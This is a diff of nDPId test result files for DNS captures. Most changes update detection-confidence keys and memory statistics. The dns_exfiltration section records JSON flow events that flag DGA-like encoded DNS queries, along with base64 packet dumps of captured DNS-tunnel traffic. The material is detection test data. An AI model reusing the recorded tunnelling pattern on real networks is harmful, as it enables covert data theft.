JlNmQ3YzRlZGE2ZjkwOBRmMmJjOTlhNjAxZTFhODIyMTMzNgA="} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1580978146717,"flow_last_seen":1580978146888,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1580978146888,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1580978146717,"flow_last_seen":1580978146888,"flow_idle_time":200000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1580978146888,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e1aa8f8fdb1bbe8d5e04952141f7d4f82c7e3b06dcc8b87fad7a.19e4d098dc8c618f8d81cfeb02","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1580978147753,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1580978147753,"pkt":"qqru7hERjNzURr7ECABFAACYekZAAD8RAADAqNw4wKjLp9w1ADUAhCnHfRoBAAABAAAAAAAABmRuc2NhdDw5MWYwMDNmNTAwZjYxMjIxODEwYWVhMDAwMDA0ODYzYzY5MTU4MGVjYWQ2NmY2NGFjN2RkYjg3Yjg5YzcmOTIwMDgyMWU1MjdkNGUxNzYzMjUzYzI1ZTI5N2UyYWE0MTEzZDAAAAUAAQ=="} 
-00936{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":300,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":300,"flow_first_seen":1580978146717,"flow_last_seen":1580978206707,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":60945,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1580978206707,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00936{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":300,"source":"dns_exfiltration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":300,"flow_first_seen":1580978146717,"flow_last_seen":1580978206707,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":60945,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1580978206707,"l3_proto":"ip4","src_ip":"192.168.220.56","dst_ip":"192.168.203.167","src_port":56373,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":300,"source":"dns_exfiltration.pcap","alias":"nDPId-test","packets-captured":300,"packets-processed":300,"total-skipped-flows":0,"total-l4-payload-len":60945,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1580978206707} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 300/300 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878257 bytes -~~ total memory freed........: 5878257 bytes -~~ total allocations/frees...: 118416/118416 +~~ total memory allocated....: 6011891 bytes +~~ total memory freed........: 6011891 bytes +~~ total allocations/frees...: 121178/121178 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 1102 chars diff --git a/test/results/dns_fragmented.pcap.out b/test/results/dns_fragmented.pcap.out index df5f7bd26..874b3f916 100644 --- a/test/results/dns_fragmented.pcap.out +++ b/test/results/dns_fragmented.pcap.out 
@@ -2,149 +2,149 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1558968008021} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1558968008021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1558968008021,"pkt":"AAwpil3XAIac51UUCABFAABE5WoAAG8R7BGs2ShMwRjj7t1oADUAMAwz1D8AEAABAAAAAAABCHdlYmVybGFiAmRlAAAwAAEAACkQAAAAgAAAAA=="} 
-00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
02439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1558968008021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968008021,"pkt":"AIac51UUAAwpil3XCABFAAXc0P4gAEARCebBGOPurNkoTAA13WgGrrRj1D+EEAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwAMAABAAAAPAEIAQADCgMBAAHQVNwo8VCsO0nmM2u3Mcqv14N851ULDM7hf1Hi2ooDrm7SR4cYS\/ptdvSMUJEyqPCUSF3Clw\/mlYs7YppfPvATwlxTT37RaXRQswUTRh4\/3GtYPxZXJOr+Wr2nwf4Rqm1imNixBim+ZLWFho\/CQdJqyhqg2VT8ongtHWFb9Nojmjr1IXZe0LYFcm0d1eoB5YaBtAcRvhm41KfjcjwpW7jDiMH5W1RgefeOj8kBkIJxjV9i9TB7pjmmAvw91J8s0GTTJqo\/ORsAzT8BHg3y6usJtQVH8ezMMHBFbjtgdGJlMoj4kn1KBk8Jtj9ZxjTIZWIo922PVb8sQqj0JytLOU69wAwALgABAAAAPAIfADAKAgAAADxdChURXOJ+MzN7CHdlYmVybGFiAmRlAB+yP4V\/njTX1ZrAUX52Q4ppNzTYQFwUb\/fZ7UyQYLNxrrstLuUEImGhNwZoGn47E0jCxJscYiApT\/lYiL2L1ySUl4RKqHIjPNuYuibs67t5ZabkYsahlYEA\/lOcM3eIQx9pu5Og7p1d2yBSUETOBiGw2mFf2+ESni6Ue4XPXEEYzAhiMRhuYOJAy8gBqoPjkRBcJfWJSQLCsK1uYySkTZfbAzgJeVM0nXd6azgG0BhRE+LeaO6rN3QVHDtfgnwRdZ0mqwEcP9Ixz7o9MUVSKZ24Kp1QfS5nvEHn5PilNALbZYZOO0cQAeV8BhlxVuALLDecEOLC8sY1mx6ozY5\/aRypyHA9HCrJT0qIHJwg
txE7ldoWyzsz32MKgZvCYMZSPOXK\/W3p61FPtD4iT4Id6xXDvyRuALL3waMUMwy3mSjXDHAdpXWaCOMfYx2IzRk4rN5TDQtUohYwaoSbystwDYKnhZGi9jS0G8FObyWhTrKCl7aTkMBaFEejCh0dfD5WJP+MDS\/TR32BG0S+GtGTl4n1Y8wgyP7nkz3\/REcevkIvpJRUImVc8A\/VPTI+9KvBSkoLPA9Za\/IpqUpgDVsKWU5bp0V0TdEryxvtwOnVXXdH0\/hJMgIgWhmZzY2\/UVoRBVGptWsAIhn5sO+UhcjvZ41p3t\/1mWp23BdUACblNtHcw2MALgABAAAAPAEfADAKAgAAADxdChURXOJ+M5BHCHdlYmVybGFiAmRlAHoYKuiyNMNSWsfXwtRR8n\/pKy73at02yEwt1EoWyfptV8sUoxs="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968008021,"flow_last_seen":1558968008021,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968008021,"l3_proto":"ip4","src_ip":"172.217.40.76","dst_ip":"193.24.227.238","src_port":56680,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00209{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":230,"global_ts_msec":1558968008021} 00631{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":264,"pkt_l4_len":0,"thread_ts_msec":1558968008021,"pkt":"AIac51UUAAwpil3XCABFAAD60P4AuUARLg\/BGOPurNkoTJJWaQ8FS9tIHo+oVjY51cy6+fgiJNB2zCSb2h1J8D40RJyUZYc0lguNGrMzvogBYnbxInuDKD2B8SGaumxsynJulBSZTde74knucmk+7g4DbM0zyfRD0W3RhD3u0NFdji\/0zmiI817VkCE2GpVvuL3F8KDCC+EMYjJlOHqM+STJxPq9ZF8xJcVITkC6EY6CdRmYmQdqvRYWzDXPjGtyu5XT13H1VC8IJisNUehBDr2PeppANUdXFlyqVQ6mARL6UnTBT0xam7DpmuxycO7BOql2rC7KBJb4lykg9AAAKRAAAACAAAAA"} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1558968010233,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":120,"pkt_l4_len":66,"thread_ts_msec":1558968010233,"pkt":"AAwpil3XAIac51UUht1gArj8AEIRayoAFFBAEwwDAAAAAAAAAQogAQRwdlsAAAAAAAAKJQBTtWEANQBC7JLpxAAQAAEAAAAAAAECcGEId2ViZXJsYWICZGUAABwAAQAAKRAAAACAAAAPAAgACwACOAAgAQRwHwsW"} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968010233,"flow_last_seen":1558968010233,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1558968010233,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1558968010234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1510,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":1510,"pkt_l4_len":1448,"thread_ts_msec":1558968010234,"pkt":"AIac51UUAAwpil3Xht1gB4f9BbAsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMAwAAAAAAAAEKEQAAAShAPAsANbVhBeUUjunEhBAAAQACAAMACQJwYQh3ZWJlcmxhYgJkZQAAHAABwAwAHAABAAAAPAAQIAEEcB8LECQAAAAAAAAAAsAMAC4AAQAAADwBHwAcCgMAAAA8XQZZ\/FzevuyQRwh3ZWJlcmxhYgJkZQC1pnXN9aJB47xcEl0t+RyJPr\/p+1OSRyBEPleyPVcVG13SY1au\/jvJTdnRA4lySA7r3bi4LlJCEattffR4fjevK4f+NrGd0s5mJ+PRg85+C1QnHQmbvL9v+MI2zPL2z8n5PSX3Yf1y4VNvPCJ7YmzWzkyABQys7VcUh58r0Vf2MDfcX+p\/oqdfN5wH3piEMrifXVk3S1jvEgqm3k\/0jIc5bfsXYFPDiziLSsKruSCkr5Ydv6DPypeAQh8lSdezjVxYVAOnbrtC88Q7QQ04+1dWXmZGW9cG+PBKFrFDsPDKsCvsJ0ggc3+bJXpyZZ0SaqfH4Zgi8NjO\/iMCsrSxLkS9wFoAAgABAAAAPAAPA25zMgh3ZWJlcmRuc8BjwFoAAgABAAAAPAAGA25zMcF3wFoALgABAAAAPAEfAAIKAgAAADxdCgDsXOJvNZBHCHdlYmVybGFiAmRlAHSoxNqqAKym4hw9iI9\/cGB9AOyri1gZ9PRCVa3kokohNFwwgJZHh\/GYLEe5aVQ16NDPaZsaEDNFKVzAqyIPhTpD66im4JiAdIma3+zQ6MM9+50XgE4zD34pXPziEN3\/hpyx0OsRaMDdi+fLJ+VSFGsK+dEf7olAlTzREwS8gAhMxbir6bK5GyMP0HpB+N56qoJQqvHlvC11N4HQ1PiAfHGM\/e0cnoTP4HtNoJs4zlO01ipMUjuZ2yl3aHqydGgSm9jswrVneievkN6cP9\/osHneUEe3pq+Na767DBQ6GotyiL0ifYjqRt+tp11FZgz+RwhCI599k5mxFSecocr80szBjgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwXMAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8GOAAEAAQAADhAABMEY4+7BcwABAAEAAA4QAATC9wUOwY4ALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALFKzqMjh9BzTzk7te1fsFGook8hWPtH0Dh2qeLmkPiC00JY45Dj2PARXv44katX35tAeXg4ix8QZs+c1GIcPatTaDXZe6J7CgZjoERP+ecNOmJ3vNLtj8s3UGq5X1b66ao4qdZN6E8DXjYpPWxeaD+6KZd7ytQjBmRNzONHV4CNwY4ALgABAAAOEACfABwIA
wAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAEEPt\/jvpNYZTaxUf\/hq3Z6tUps6XBA9Yu325Bwy3LukMjtOntkxZ48rvFNij79Ioq3EbGxCb4PD0EVLtA5lKR6U69jYrdbsh11ahmIq4c0voBJAKVJkpfioqYTXkZCppD5DWEnFc7+3dmCZtR6n7cdLRMGXeU0ee7boqf+ntG0ywXMALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAAdbeEFbg2lg4i3rnV+6yQt2VeYizGmT\/rDt7rXbe9Gvg0bs7cCzKvh3nLNc7lfkw3Toxu3h2m\/NqvAJNkxLRmrtfxw68cyy4lkHhL2NLL3Y19jvp2qm25mZVgwcJylB9Dlvk0ReqgeiL8E1GyKZ+bYJb4PW+X45ewaJrdYFgGv4wXMALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALY71RRfBids18YMqfb3pDV95vjCv9gQTwdXg7KIz9hcjsWC4LdX4rCK4Rics7xQ5QaBNODVJNd5alz0R5hMDerxbEpzVvoggNs6EwCYRezdSpP5C3DJFx6i88C2SQ=="} -00810{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968010234,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 
+00810{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":200000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1558968010234,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pa.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}} 00209{"error_event_id":12,"error_event_name":"nDPI IPv6\/L4 payload detection failed","datalink":1,"packet_id":6,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":89,"global_ts_msec":1558968010234} 00443{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":123,"pkt_l4_len":0,"thread_ts_msec":1558968010234,"pkt":"AIac51UUAAwpil3Xht1gB4f9AEUsQCABBHB2WwAAAAAAAAolAFMqABRQQBMMAwAAAAAAAAEKEQAFqChAPAtderZqHOphjXllMk8sHswGkSaaDoR\/AL9bqSnISQXKcnns5gAAKRAAAACAAAAPAAgACwACOAAgAQRwHwsW"} 
00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1558968018074,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968018074,"pkt":"AAwpil3XAIac51UUht1gCQGuAEMRayoAFFBAEwwGAAAAAAAAAQUgAQRwdlsAAAAAAAAKJQBT94kANQBDODsKMgAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAABAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968018074,"flow_last_seen":1558968018074,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968018074,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
